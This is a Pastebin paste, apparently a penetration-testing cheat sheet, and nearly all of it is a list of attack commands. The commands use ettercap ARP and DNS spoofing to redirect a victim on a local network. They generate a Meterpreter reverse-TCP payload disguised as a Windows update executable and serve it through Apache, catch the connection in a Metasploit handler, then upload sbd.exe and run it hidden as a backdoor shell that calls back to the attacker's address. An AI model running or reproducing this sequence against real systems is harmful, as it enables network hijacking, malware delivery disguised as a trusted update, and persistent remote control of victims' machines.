Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- cd /usr/share/ettercap/
- cp etter.dns etter.dns.old
- kwrite /usr/share/ettercap/etter.dns
- sh -c "start-apache"
- cd /pentest/exploits/framework3
- ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.104 X > /var/www/Windows-KB174529-x86-ENU.exe
- ./msfconsole
- use exploit/multi/handler
- set PAYLOAD windows/meterpreter/reverse_tcp
- set LHOST 192.168.1.104
- exploit
- ettercap -i wlan0 -T -q -P dns_spoof -M ARP /192.168.1.1/ /192.168.1.101/
- upload /root/tools/backdoors/sbd-1.36/sbd.exe C:/
- execute -H -f "C:/sbd.exe -q -r 10 -k g0tmi1k -e cmd -p 7332 192.168.1.104"
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement